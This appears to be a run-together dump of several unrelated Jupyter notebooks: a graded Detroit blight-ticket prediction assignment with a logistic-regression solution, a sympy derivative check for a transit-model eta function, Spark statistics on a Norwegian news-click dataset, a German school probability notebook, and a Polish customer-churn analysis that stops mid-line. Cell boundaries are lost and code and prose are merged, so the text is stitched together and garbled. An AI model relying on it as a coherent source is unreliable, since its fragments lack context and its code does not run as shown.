compliance, which is True if the ticket was paid early, on time, or within one month of the hearing data, False if the ticket was paid after the hearing date or not at all, and Null if the violator was found not responsible. Compliance, as well as a handful of other variables that will not be available at test-time, are only included in train.csv.Note: All tickets where the violators were found not responsible are not considered during evaluation. They are included in the training set as an additional source of data for visualization, and to enable unsupervised and semi-supervised approaches. However, they are not included in the test set.**File descriptions** (Use only this data for training your model!) train.csv - the training set (all tickets issued 2004-2011) test.csv - the test set (all tickets issued 2012-2016) addresses.csv & latlons.csv - mapping from ticket id to addresses, and from addresses to lat/lon coordinates. Note: misspelled addresses may be incorrectly geolocated.**Data fields**train.csv & test.csv ticket_id - unique identifier for tickets agency_name - Agency that issued the ticket inspector_name - Name of inspector that issued the ticket violator_name - Name of the person/organization that the ticket was issued to violation_street_number, violation_street_name, violation_zip_code - Address where the violation occurred mailing_address_str_number, mailing_address_str_name, city, state, zip_code, non_us_str_code, country - Mailing address of the violator ticket_issued_date - Date and time the ticket was issued hearing_date - Date and time the violator's hearing was scheduled violation_code, violation_description - Type of violation disposition - Judgment and judgement type fine_amount - Violation fine amount, excluding fees admin_fee - $20 fee assigned to responsible judgmentsstate_fee - $10 fee assigned to responsible judgments late_fee - 10% fee assigned to responsible judgments discount_amount - discount applied, if any clean_up_cost - DPW clean-up or graffiti removal cost judgment_amount - Sum of all fines and fees grafitti_status - Flag for graffiti violations train.csv only payment_amount - Amount paid, if any payment_date - Date payment was made, if it was received payment_status - Current payment status as of Feb 1 2017 balance_due - Fines and fees still owed collection_status - Flag for payments in collections compliance [target variable for prediction] Null = Not responsible 0 = Responsible, non-compliant 1 = Responsible, compliant compliance_detail - More information on why each ticket was marked compliant or non-compliant___ EvaluationYour predictions will be given as the probability that the corresponding blight ticket will be paid on time.The evaluation metric for this assignment is the Area Under the ROC Curve (AUC). Your grade will be based on the AUC score computed for your classifier. A model which with an AUROC of 0.7 passes this assignment, over 0.75 will recieve full points.___For this assignment, create a function that trains a model to predict blight ticket compliance in Detroit using `train.csv`. Using this model, return a series of length 61001 with the data being the probability that each corresponding ticket from `test.csv` will be paid, and the index being the ticket_id.Example: ticket_id 284932 0.531842 285362 0.401958 285361 0.105928 285338 0.018572 ... 376499 0.208567 376500 0.818759 369851 0.018528 Name: compliance, dtype: float32 Hints* Make sure your code is working before submitting it to the autograder.* Print out your result to see whether there is anything weird (e.g., all probabilities are the same).* Generally the total runtime should be less than 10 mins. You should NOT use Neural Network related classifiers (e.g., MLPClassifier) in this question. * Try to avoid global variables. If you have other functions besides blight_model, you should move those functions inside the scope of blight_model.* Refer to the pinned threads in Week 4's discussion forum when there is something you could not figure it out.import pandas as pd import numpy as np def blight_model(): # Your code here X_train = pd.read_csv('train.csv', encoding='ISO-8859-1') X_test = pd.read_csv('test.csv', encoding='ISO-8859-1') X_train = X_train[pd.notnull(X_train['compliance'])] y_train = X_train['compliance'] X_train = X_train.drop(['payment_amount', 'payment_date', 'payment_status', 'balance_due', 'collection_status', 'compliance', 'compliance_detail'], axis=1) address = pd.read_csv('addresses.csv') loc = pd.read_csv('latlons.csv') X_train = X_train.merge(address.merge(loc, how='inner', on='address'), how='inner', on='ticket_id') X_test = X_test.merge(address.merge(loc, how='inner', on='address'), how='inner', on='ticket_id') X_train.set_index('ticket_id', inplace=True) X_test.set_index('ticket_id', inplace=True) X_train = X_train.drop(['inspector_name', 'violator_name', 'violation_street_number', 'violation_street_name', 'violation_zip_code', 'mailing_address_str_number', 'mailing_address_str_number', 'mailing_address_str_name', 'zip_code', 'non_us_str_code', 'country', 'violation_code', 'city', 'violation_description', 'fine_amount', 'admin_fee', 'state_fee', 'late_fee', 'discount_amount', 'clean_up_cost', 'address', 'grafitti_status'], axis=1) y_train.reset_index(drop=True, inplace=True) X_test = X_test.drop(['inspector_name', 'violator_name', 'violation_street_number', 'violation_street_name', 'violation_zip_code', 'mailing_address_str_number', 'mailing_address_str_number', 'mailing_address_str_name', 'zip_code', 'non_us_str_code', 'country', 'violation_code', 'city', 'violation_description', 'fine_amount', 'admin_fee', 'state_fee', 'late_fee', 'discount_amount', 'clean_up_cost', 'address', 'grafitti_status'], axis=1) X_train['state'].fillna(method='pad', inplace=True) X_train['lat'].fillna(method='pad', inplace=True) X_train['lon'].fillna(method='pad', inplace=True) X_test['state'].fillna(method='pad', inplace=True) X_test['lat'].fillna(method='pad', inplace=True) X_test['lon'].fillna(method='pad', inplace=True) X = pd.concat([X_train, X_test]) X = pd.get_dummies(X, columns=['agency_name', 'state', 'disposition']) X_train = X[:len(X_train)] X_test = X[len(X_train):] from datetime import timedelta, datetime null_idx = X_train['hearing_date'].isnull() filld_idx = X_train['hearing_date'].notnull() X_train['hearing_date'] = pd.to_datetime(X_train["hearing_date"], format="%Y-%m-%d %H:%M:%S") X_train['ticket_issued_date'] = pd.to_datetime(X_train["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") avg_time_diff = (X_train[filld_idx]['hearing_date'] - X_train[filld_idx]['ticket_issued_date']).mean().days X_train['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(X_train['hearing_date'], X_train['ticket_issued_date']) ] X_train.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) null_idx = X_test['hearing_date'].isnull() filld_idx = X_test['hearing_date'].notnull() X_test['hearing_date'] = pd.to_datetime(X_test["hearing_date"], format="%Y-%m-%d %H:%M:%S") X_test['ticket_issued_date'] = pd.to_datetime(X_test["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") X_test['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(X_test['hearing_date'], X_test['ticket_issued_date']) ] X_test.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) from sklearn.preprocessing import MinMaxScaler from sklearn.linear_model import LogisticRegression from sklearn.model_selection import GridSearchCV from sklearn.metrics import roc_auc_score, confusion_matrix clf = LogisticRegression() grid_values = {'C' : [0.001, 0.01, 0.1, 1, 10, 100, 1000]} grid_clf_roc = GridSearchCV(clf, param_grid=grid_values) grid_clf_roc.fit(X_train, y_train) prob = grid_clf_roc.predict_proba(X_test) prob = [x[1] for x in prob] result = pd.Series(prob, index=X_test.index) return result blight_model() X_Tr = pd.read_csv('train.csv', encoding='ISO-8859-1') X_Tr = X_Tr[pd.notnull(X_Tr['compliance'])] Y_Tr = X_Tr['compliance'] X_Tr = X_Tr.drop(['payment_amount', 'payment_date', 'payment_status', 'balance_due', 'collection_status', 'compliance', 'compliance_detail'], axis=1) address = pd.read_csv('addresses.csv') loc = pd.read_csv('latlons.csv') X_Tr = X_Tr.merge(address.merge(loc, how='inner', on='address'), how='inner', on='ticket_id') X_Tr = X_Tr.drop(['ticket_id', 'inspector_name', 'violator_name', 'violation_street_number', 'violation_street_name', 'violation_zip_code', 'mailing_address_str_number', 'mailing_address_str_number', 'mailing_address_str_name', 'zip_code', 'non_us_str_code', 'country', 'violation_code', 'city', 'violation_description', 'fine_amount', 'admin_fee', 'state_fee', 'late_fee', 'discount_amount', 'clean_up_cost', 'address', 'grafitti_status'], axis=1) Y_Tr.reset_index(drop=True, inplace=True) X_Tr.columns X_Tr['state'].fillna(method='pad', inplace=True) X_Tr['lat'].fillna(method='pad', inplace=True) X_Tr['lon'].fillna(method='pad', inplace=True) from sklearn.model_selection import train_test_split x_tr, x_ts, y_tr, y_ts = train_test_split(X_Tr, Y_Tr, random_state=1) X = pd.concat([x_tr, x_ts]) X = pd.get_dummies(X, columns=['agency_name', 'state', 'disposition']) x_tr = X[:len(x_tr)] x_ts = X[len(x_tr):] from datetime import timedelta, datetime null_idx = x_tr['hearing_date'].isnull() filld_idx = x_tr['hearing_date'].notnull() x_tr['hearing_date'] = pd.to_datetime(x_tr["hearing_date"], format="%Y-%m-%d %H:%M:%S") x_tr['ticket_issued_date'] = pd.to_datetime(x_tr["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") avg_time_diff = (x_tr[filld_idx]['hearing_date'] - x_tr[filld_idx]['ticket_issued_date']).mean().days x_tr['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(x_tr['hearing_date'], x_tr['ticket_issued_date']) ] x_tr.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) null_idx = x_ts['hearing_date'].isnull() filld_idx = x_ts['hearing_date'].notnull() x_ts['hearing_date'] = pd.to_datetime(x_ts["hearing_date"], format="%Y-%m-%d %H:%M:%S") x_ts['ticket_issued_date'] = pd.to_datetime(x_ts["ticket_issued_date"], format="%Y-%m-%d %H:%M:%S") x_ts['Time diff'] = [(date_h - date_i).days if pd.notnull(date_h) else avg_time_diff \ for (date_h, date_i) in zip(x_ts['hearing_date'], x_ts['ticket_issued_date']) ] x_ts.drop(['hearing_date', 'ticket_issued_date'], axis=1, inplace=True) from sklearn.linear_model import LogisticRegression from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.ensemble import GradientBoostingClassifier from sklearn.svm import SVC from sklearn.model_selection import GridSearchCV from sklearn.metrics import roc_auc_score, confusion_matrix clf = LogisticRegression() clf.fit(x_tr, y_tr) roc_auc_score(y_tr, clf.decision_function(x_tr)) from sklearn.preprocessing import MinMaxScaler minmax = MinMaxScaler() x_tr = minmax.fit_transform(x_tr) x_ts = minmax.transform(x_ts) clf.fit(x_tr, y_tr) roc_auc_score(y_ts, clf.decision_function(x_ts)) roc_auc_score(y_tr, clf.decision_function(x_tr)) # roc_tr = [] # roc_ts = [] # parameter = [] # for param in [0.001, 0.01, 0.1, 1, 10, 100, 1000]: # print(param) # clf = LogisticRegression(C=param) # clf.fit(x_tr, y_tr) # roc_tr.append(roc_auc_score(y_tr, clf.decision_function(x_tr))) # roc_ts.append(roc_auc_score(y_ts, clf.decision_function(x_ts))) # parameter.append(param) # import matplotlib.pyplot as plt # plt.plot(parameter, roc_tr) # plt.plot(parameter, roc_ts) # plt.show()The $\eta$ functionimport numpy as np import matplotlib.pyplot as pl %matplotlib notebook from IPython.display import display, Math import sympy from sympy import * # Initialize the session init_session(quiet=True) # Let's report what version of sympy this is print("Using sympy version", sympy.__version__) eta, r, b, k0, k1, A, k2 = symbols("\eta r b kappa_0 kappa_1 A, k^2") k2 = (1 - r ** 2 - b ** 2 + 2 * b * r) / (4 * b * r) A = Rational(1, 2) * sqrt((1 + (r + b)) * (b - (1 - r)) * (b + (1 - r)) * (1 + (r - b))) k0 = atan2(2 * A, (r - 1) * (r + 1) + b ** 2) k1 = atan2(2 * A, (1 - r) * (1 + r) + b ** 2)The $\eta$ function in the paper is identical to $\eta_1$ (for $k^2 \le 1$) and $\eta_2$ (for $k^2 > 1$) in Equation (7) of Mandel & Agol (2002). Below we compute its derivatives with respect to $b$ and $r$. $k^2 \le$ 1eta = 1 / (2 * pi) * (k1 + r ** 2 * (r ** 2 + 2 * b ** 2) * k0 - Rational(1, 2) * (1 + 5 * r ** 2 + b ** 2) * A)This is the derivative according to the paper:detadr_paper = (2 * r / pi) * ((r ** 2 + b ** 2) * k0 - 2 * A)Is it correct?simplify(diff(eta, r) - detadr_paper) == 0**QED** This is the derivative according to the paper:detadb_paper = (1 / (2 * pi * b)) * (4 * r ** 2 * b ** 2 * k0 - 2 * (1 + b ** 2 + r ** 2) * A)Is it correct?simplify(diff(eta, b) - detadb_paper) == 0**QED** $k^2$ > 1eta = r ** 2 / 2 * (r ** 2 + 2 * b ** 2) simplify(diff(eta, r))**QED**simplify(diff(eta, b))Connect to Google Drive%%capture import google.colab.drive google.colab.drive.mount('/content/gdrive', force_remount=True)Install Spark and dependenciesimport os os.environ['HADOOP_VERSION'] = '2.7' os.environ['JAVA_HOME'] = '/usr/lib/jvm/java-8-openjdk-amd64' os.environ['SPARK_HOME'] = '/opt/spark' os.environ['SPARK_VERSION'] = '2.4.3' %%capture !wget -qN https://archive.apache.org/dist/spark/spark-$SPARK_VERSION/spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION.tgz !tar -xzf spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION.tgz -C /opt !rm spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION.tgz !rm -rf /opt/spark !ln -s /opt/spark-$SPARK_VERSION-bin-hadoop$HADOOP_VERSION /opt/spark !pip install -q findsparkCreate SparkSessionimport findspark findspark.init() from pyspark.sql import SparkSession spark = SparkSession.builder.master('local[*]').getOrCreate()Read filesimport json import pyspark.sql.functions as F import pyspark.sql.types as T DATA_PATH = '/content/gdrive/My Drive/dataset/adressa/one_week' with open(os.path.join(DATA_PATH, 'schema', 'clean.json')) as file: clean_schema = T.StructType.fromJson(json.load(file)) df_clean = spark.read.json(os.path.join(DATA_PATH, 'clean'), schema=clean_schema) df_clean.cache()Do some basic statisticsdf_clean.show(truncate=False)+-------------------------------------------+----------+----------------------------------------+-----------+-----------------------+ |userId |time |newsId |publishtime|categoryList | +-------------------------------------------+----------+----------------------------------------+-----------+-----------------------+ |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483386860|cf83d342459ce871e2a8562a91b7dca946e3201a|1483369567 |[nyheter, moreromsdal] | |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483802430|01d923a1af0487ccbf9804bea12f49c12727214a|1483797105 |[100sport, fotball] | |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483802488|7e98f8a1a50a409a25831be225e01e261dfe04fc|1483790765 |[100sport, vintersport]| |cx:10aahg3cyumaa128zgcrqm02zi:2gi7mzuwpxq8j|1483826863|7e98f8a1a50a409a25831be225e01e261dfe04fc|1483790765 |[100sport, vintersport]| |cx:10bpet3dluncp1iz2clzlonsd:27z0v4p30cx3n |1483266354|05e420[...]Number of eventsn_events = df_clean.count() n_eventsNumber of usersn_users = df_clean.select(F.column('userId')).distinct().count() n_usersNumber of itemsn_items = df_clean.select(F.column('newsId')).distinct().count() n_itemsSparsityn_events / (n_users * n_items)Disk usage!du -sh /content/gdrive/My\ Drive/dataset/adressa/one_week/clean218M /content/gdrive/My Drive/dataset/adressa/one_week/cleanTrain and testtrain_test_split_time = 1483743600 # 2017/01/06 23:00:00 UTCTrain sizetrain_size = df_clean.filter(F.column('time') < train_test_split_time).count() train_sizeTest sizetest_size = df_clean.filter(F.column('time') >= train_test_split_time).count() test_sizeTrain / test ratiotrain_size / test_sizeNumber of clicks Per user( df_clean .groupBy('userId') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+------------------+ |min(count)|max(count)|avg(count) | +----------+----------+------------------+ |1 |223 |4.8619605386286855| +----------+----------+------------------+Per item( df_clean .groupBy('newsId') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+-----------------+ |min(count)|max(count)|avg(count) | +----------+----------+-----------------+ |1 |43106 |1185.848162475822| +----------+----------+-----------------+Per day( df_clean .select(F.dayofyear(F.from_unixtime(F.column('time') + 3600)).alias('day')) .filter( (F.column('day') > 0) & (F.column('day') < 8) ) .groupBy('day') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+------------------+ |min(count)|max(count)|avg(count) | +----------+----------+------------------+ |59856 |233916 |175166.14285714287| +----------+----------+------------------+Number of items published per day( df_clean .dropDuplicates(subset=['newsId']) .select(F.dayofyear(F.from_unixtime(F.column('publishtime') + 3600)).alias('day')) .filter( (F.column('day') > 0) & (F.column('day') < 8) ) .groupBy('day') .count() .agg( F.min('count'), F.max('count'), F.avg('count'), ) ).show(truncate=False)+----------+----------+----------+ |min(count)|max(count)|avg(count)| +----------+----------+----------+ |37 |69 |55.0 | +----------+----------+----------+Time between clicksfrom pyspark.sql import WindowPer user( df_clean .withColumn( 'timeLastClick', F.sum('time').over( Window .partitionBy('userId') .orderBy('time') .rowsBetween(-1, -1) ) ) .filter(F.column('timeLastClick').isNotNull()) .withColumn( 'timeFromLastClick', (F.column('time') - F.column('timeLastClick')), ) .agg( F.min('timeFromLastClick'), F.max('timeFromLastClick'), F.avg('timeFromLastClick'), ) ).show(truncate=False)+----------------------+----------------------+----------------------+ |min(timeFromLastClick)|max(timeFromLastClick)|avg(timeFromLastClick)| +----------------------+----------------------+----------------------+ |1 |603198 |39673.53356516775 | +----------------------+----------------------+----------------------+Per item( df_clean .withColumn( 'timeLastClick', F.sum('time').over( Window .partitionBy('newsId') .orderBy('time') .rowsBetween(-1, -1) ) ) .filter(F.column('timeLastClick').isNotNull()) .withColumn( 'timeFromLastClick', (F.column('time') - F.column('timeLastClick')), ) .agg( F.min('timeFromLastClick'), F.max('timeFromLastClick'), F.avg('timeFromLastClick'), ) ).show(truncate=False)+----------------------+----------------------+----------------------+ |min(timeFromLastClick)|max(timeFromLastClick)|avg(timeFromLastClick)| +----------------------+----------------------+----------------------+ |0 |594142 |137.89515424039675 | +----------------------+----------------------+----------------------+Materialien zu zufallAutor: - Aufgaben 4 - Mehrere Listen Siehe dazuElemente der MathematikLeistungskurs StochastikSchroedel 2003S. 87 Aufgabe 9a%run zufall/start1. Augensumme beim gemeinsamen Werfen von Tetraeder und OktaederEs wird die Zufallsgröße $X$ = "Augensumme beim gemeinsamen Werfen eines regu-lären Tetraeders und Oktaeders" betrachtet. Gesucht ist ihre Verteilung Das Zufallsexperiment kann mit den beiden ListenL4 = [1, 2, 3, 4]; L8 = list(range(1, 9)); L4, L8beschrieben werden; $X\,$ wird mittels einer ZG-Funktion definiertX = ZE(L4, L8, f=summe) X.vert X.hist2. Mehrkampfleistung eines SportlersDie Aufgabe wurde entnommen ausSIGMA Grundkurs StochastikErnst Klett Verlag 1982S. 76 Aufgabe 9Aus jeder der abgebildeten Urnen wird eine Kugel entnommen. Man interessiert sich für die Summe der darauf stehenden Zahlen(Über die Leistungen des Sportlers in den Einzeldisziplinen liegt statistischesMaterial vor. Eine Kugel mit der Nummer $i$ bedeutet, dass der Sportler für die entsprechende Leistung $90+i$ Punkte erhält ) Die Routine zur Herstellung der Grafik befindet sich am Ende des Notebooks)Ein Versuch erbringt 4 Kugeln, $X_i\,$ sei die Zufallsgröße, die der $i$. Kugel ihre Punktzahl zuordnet ($i = 1,2,3,4$). Die Verteilungen dieser Zufallsgrößen sind bekannt. Gesucht ist die Verteilung von $S = X_1+X_2+X_3+X_4$Folgende dict's beschreiben die UrnenL1 = {1:1, 2:1, 3:2, 4:5, 5:1} L2 = {1:4, 2:3, 3:2, 4:1} L3 ={1:2, 2:3, 3:1, 4:1, 5:3} L4 = {1:3, 2:1, 3:2, 4:1, 5:3}Die ZufallsGroesse wird aus dem 4-stufigen ZufallsExperiment erzeugt,dasauf diesen Listen basiert. Zur Addition der Einzelpunkte wird die Funktionsumme benutztS = ZE( L1, L2, L3, L4, f=summe)Erzeugung eines ZufallsGroesse-Objektes$S$ hat die Verteilung und das HistogrammS.vertInteressant ist auch der Vergleich mit der Normalverteilung, die mit dem (zwecksbesserer Einpassung mittels Versuch/Irrtum korrigierten) Erwartungswert und der Varianz von $S$ definiert wird (die betrachtete Zufallsgröße ist die Summe von vierZufallsgrößen)S.hist S.hist_(NV(S.erw-3, S.sigma)) # -3 - Verschiebung2. Zwei GlücksräderDie Aufgabe wurde entnommen aus Fischers AbiturwissenMathematikFischer Taschenbuch Verlag 2004S.327 Wir betrachten zwei Glücksräder Jemand bietet Ihnen zwei Spiele zur Auswahl an: Entweder dürfen Sie gegen ei-nen Einsatz von 3.50 € beide Glücksräder drehen und die Summe der Augenzahlen in € als Gewinn behalten, oder Sie dürfen gegen einen Einsatz von 3.50 € beideGlücksräder drehen und das Produkt der Augenzahlen in € als Gewinn behalten. Welches Spiel würden Sie wählen? Die beiden Glücksräder werden durch die ListenL1 = {0:90, 1:90, 2:60, 3:60, 4:60} L2 = {1:180, 2:60, 3:120}beschrieben (die rechten Zahlen sind die Öffnungswinkel der einzelnen Sekto-ren). Das zugrunde liegende ZufallsExperiment istGlücksRad(L1, L2)Die interessierende ZufallsGroesse $Summe$ = "Summe der Augenzahlen" kannauf der Grundlage dieses ZufallsExperimentes mit Hilfe der ZG-Funktion summeberechnet werdenSumme = GlücksRad(L1, L2, f=summe)Erzeugung eines ZufallsGroesse-ObjektesFür die ZufallsGroesse $Produkt$ = "Produkt der Augenzahlen" wird eine eigeneZG-Funktion benutztDazu dient hier eine sogenannte anonyme (unbenannte) lambda-Funktion; ihr Argument ist ein Element der Ergebnismenge in Listenform, berechnet wirddas Produkt der beiden ListenelementeProdukt = GlücksRad(L1, L2, f=lambda x: x[0]*x[1])Erzeugung eines ZufallsGroesse-ObjektesDie Histogramme der Wahrscheinlichkeitsverteilungen für die beiden Zufallsgrö-ßen sindSumme.hist; Produkt.histDie Wahrscheinlichkeitsverteilungen selbst sindSumme.vert Produkt.vertDie Erwartungswerte der beiden ZufallsGrößen sowie die Erwartungswertedes Gewinnes pro Spiel sind dann (in €)Summe.erw, Summe.erw - 3.50 Produkt.erw, Produkt.erw - 3.50Damit ist das Spiel um die Summe der Augenzahlen mit einem durchschnitt-lichen Gewinn von mehr als 8 cent günstig, während das Spiel um das Produktdurchschnittlich etwa 29 cent Verlust einbringt Grafik zu MehrkampfleistungHerstellung und Speicherung in einer Datei:import matplotlib.pyplot as plt import matplotlib.patches as patches def line(x, y): return plt.plot(x, y, color='blue', lw=1) r = 0.038 def kreis(x, y, n): k = patches.Circle((x, y+0.006), r, fill=None, edgecolor=(0,0,0), alpha=0.5) ax.add_patch(k) ax.text(x, y, str(n), fontsize=9, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times new Roman') def urne(x, y): d = 0.4 line([x, x+d], [y, y]) line([x, x], [y, y+0.7*d]) line([x+d, x+d], [y, y+0.7*d]) plt.close('all') fig = plt.figure(figsize=(4, 2.5)) ax = fig.add_subplot(1, 1, 1, aspect='equal') ax.axis('off') plt.xlim(0.01, 1.3) plt.ylim(0.09, 1.01) d1 = 0.2 urne(0.096, 0.6) urne(d1+0.547, 0.6) urne(0.096, 0.15) urne(d1+0.547, 0.15) ax.text(0.3, 0.55, 'Urne 1', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') kreis(0.3-4*r, 0.6+r, 1) kreis(0.3-2*r, 0.6+r, 2) for i in (1, 3): kreis(0.3, 0.6+i*r, 3) for i in (1, 3, 5, 7, 9): kreis(0.3+2*r, 0.6+i*r, 4) kreis(0.3+4*r, 0.6+r, 5) ax.text(d1+0.75, 0.55, 'Urne 2', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') for i in (1, 3, 5, 7): kreis(d1+0.75-4*r, 0.6+i*r, 1) for i in (1, 3, 5): kreis(d1+0.75-2*r, 0.6+i*r, 2) for i in (1, 3): kreis(d1+0.75, 0.6+i*r, 3) kreis(d1+0.75+2*r, 0.6+r, 4) ax.text(0.3, 0.1, 'Urne 3', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') for i in (1, 3): kreis(0.3-4*r, 0.15+i*r, 1) for i in (1, 3, 5): kreis(0.3-2*r, 0.15+i*r, 2) kreis(0.3, 0.15+r, 3) kreis(0.3+2*r, 0.15+r, 4) for i in (1, 3, 5): kreis(0.3+4*r, 0.15+i*r, 5) ax.text(d1+0.75, 0.1, 'Urne 4', fontsize=10, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times New Roman') for i in (1, 3, 5): kreis(d1+0.75-4*r, 0.15+i*r, 1) kreis(d1+0.75-2*r, 0.15+r, 2) for i in (1, 3): kreis(d1+0.75, 0.15+i*r, 3) kreis(d1+0.75+2*r, 0.15+r, 4) for i in (1, 3, 5): kreis(d1+0.75+4*r, 0.15+i*r, 5) #plt.savefig('mehrkampf.png') # ist bereits gespeichert #plt.show()Kontrollausgabe (in Markdown-Zelle) Grafik zu Glücksrädernimport matplotlib.pyplot as plt import matplotlib.patches as patches r = 1.1 gl1 = [1+r*cos(x), 1+r*sin(x)] gl2 = [4+r*cos(x), 1+r*sin(x)] def p1(w): return [el.subs(x, w) for el in gl1] def p2(wi): return [el.subs(x, wi) for el in gl2] def line(x, y): return plt.plot(x, y, color='black', lw=0.8) def text(x, y, n): ax.text(x, y, str(n), fontsize=9, alpha=0.9, horizontalalignment='center', verticalalignment='center', fontname='Times new Roman') plt.close('all') fig = plt.figure(figsize=(4, 2)) ax = fig.add_subplot(1, 1, 1, aspect='equal') ax.axis('off') plt.xlim(-0.2, 5.5) plt.ylim(-0.2, 2.2) kreis1 = patches.Circle((1, 1), 1.1, fill=None, edgecolor=(0,0,0), alpha=0.5) kreis2 = patches.Circle((4, 1), 1.1, fill=None, edgecolor=(0,0,0), alpha=0.5) ax.add_patch(kreis1) ax.add_patch(kreis2) for w in (0, pi/3, 2/3*pi, pi, 3/2*pi): p = [float(p1(w)[0]), float(p1(w)[1])] line([1, p[0]], [1, p[1]]) for w in (pi/2, 5/6*pi, 3/2*pi): p = [float(p2(w)[0]), float(p2(w)[1])] line([4, p[0]], [1, p[1]]) ax.arrow(0.85, 0.2, 0.335, 1.6, head_width=0.085, head_length=0.25, fc='b', ec='b') ax.arrow(3.85, 0.2, 0.335, 1.6, head_width=0.085, head_length=0.25, fc='b', ec='b') for t in [(0.5, 0.5, 0), (1.5, 0.5, 1), (1.6, 1.4, 2), (1, 1.7, 3), (0.4, 1.4, 4), \ (4.5, 1, 0), (3.7, 1.6, 1), (3.5, 0.5, 2)]: text(*t) #plt.savefig('gluecksraeder.png') # ist bereits gespeichert #plt.show()1. Import bibliotekimport numpy as np import pandas as pd from collections import Counter import matplotlib.pyplot as plt import math import seaborn as sns from matplotlib import font_manager as fm from sklearn.linear_model import LinearRegression from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler import statsmodels.api as sm from sklearn.cluster import KMeans from sklearn.feature_selection import RFE from sklearn.ensemble import ExtraTreesClassifier from sklearn.feature_selection import SelectKBest from sklearn.feature_selection import f_classif from sklearn.linear_model import LogisticRegression import sklearn.metrics from sklearn.metrics import accuracy_score from sklearn.metrics import roc_auc_score from sklearn.metrics import confusion_matrix from sklearn.metrics import roc_curve from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import GridSearchCV from sklearn.pipeline import Pipeline from sklearn.model_selection import RepeatedStratifiedKFold import xgboost as xgb from xgboost import XGBClassifier from sklearn.model_selection import RandomizedSearchCV from sklearn.cluster import AgglomerativeClustering from scipy.cluster import hierarchy from scipy.cluster.hierarchy import dendrogram, linkage from sklearn.metrics import precision_recall_curve from sklearn.metrics import plot_precision_recall_curve from sklearn.metrics import precision_score from sklearn.metrics import recall_score2. Import bazy danychdf = pd.read_csv('train.csv')3. Podstawowe sprawdzeniadf.head() df.describe() df.info() RangeIndex: 4250 entries, 0 to 4249 Data columns (total 20 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 state 4250 non-null object 1 account_length 4250 non-null int64 2 area_code 4250 non-null object 3 international_plan 4250 non-null object 4 voice_mail_plan 4250 non-null object 5 number_vmail_messages 4250 non-null int64 6 total_day_minutes 4250 non-null float64 7 total_day_calls 4250 non-null int64 8 total_day_charge 4250 non-null float64 9 total_eve_minutes 4250 non-null float64 10 total_eve_calls 4250 non-null int64 11 total_eve_charge 4250 non-null float64 12 total_night_minutes 4250 non-null f[...]4. Podział zbioru na testowy i treningowytrain,test = train_test_split(df,test_size=0.3,stratify=df['churn']) print(f"Obserwacje w zbiorze treningowym: {len(train)}\nObserwacje w zbiorze testowym: {len(test)}\n")Obserwacje w zbiorze treningowym: 2975 Obserwacje w zbiorze testowym: 12755. Sprawdzenie zmiennej celutrain['churn'].value_counts(normalize=True) fig = plt.figure(1, figsize=(5,5)) ax = fig.add_axes([0.1, 0.1, 0.8, 0.8]) plt.title('Rozkład zmiennej churn', fontsize=20) patches, texts, autotexts = ax.pie(train['churn'].value_counts(), labels=['no', 'yes'], autopct='%1.1f%%', shadow=True, startangle=140, colors=['lightpink', 'paleturquoise']) proptease = fm.FontProperties() proptease.set_size('xx-large') plt.setp(autotexts, fontproperties=proptease) plt.setp(texts, fontproperties=proptease) plt.show()6. Opisowa analiza danych 6.1 Kolumny znakowe i zero-jedynkowetrain['state'].value_counts() train['area_code'].value_counts() char_cols = ['area_code','state','international_plan','voice_mail_plan'] for i in char_cols: cross = pd.crosstab(train[i], train['churn']) totals = [i+j for i,j in zip(cross['no'], cross['yes'])] yes = [i/j * 100 for i,j in zip(cross['yes'],totals)] no = [i/j * 100 for i,j in zip(cross['no'], totals)] barWidth = 0.85 r = cross.index plt.figure(figsize=(20,7)) colors = {0:'lightpink', 1:'paleturquoise'} labels = list(colors.keys()) handles = [plt.Rectangle((0,0),1,1, color=colors[label]) for label in labels] plt.bar(r, yes, color='paleturquoise', width=barWidth) plt.bar(r, no, bottom=yes, color='lightpink', width=barWidth) plt.legend(handles, labels) plt.xticks(r) plt.xlabel(i) plt.title(i) plt.show() #stan NJ ma więcej i CA a najmniej ma AK a area_code jest podobnie6.2 Kolumny numerycznenum_cols = [i for i in train.columns if i not in char_cols and i!= 'churn'] num_cols for i in num_cols: a_df = pd.DataFrame() a_df[i + '_yes'] = (train[train['churn'] == 'yes'][['churn', i]].describe())[i] a_df[i + '_no'] = (train[train['churn'] == 'no'][['churn',i]].describe())[i] print(i) print(a_df) print('') #średnie i mediana porównując yes i no chyba że mocno będą różnić się min/max for i in num_cols: plt.hist(train[i]) plt.title(i) plt.show()7. Podstawowe przekształcenia danych 7.1 Zmiana danych yes/no na 1/0zmienneYesNo = ['international_plan','voice_mail_plan','churn'] for zmienne in zmienneYesNo: train[zmienne] = np.where(train[zmienne] == 'yes', 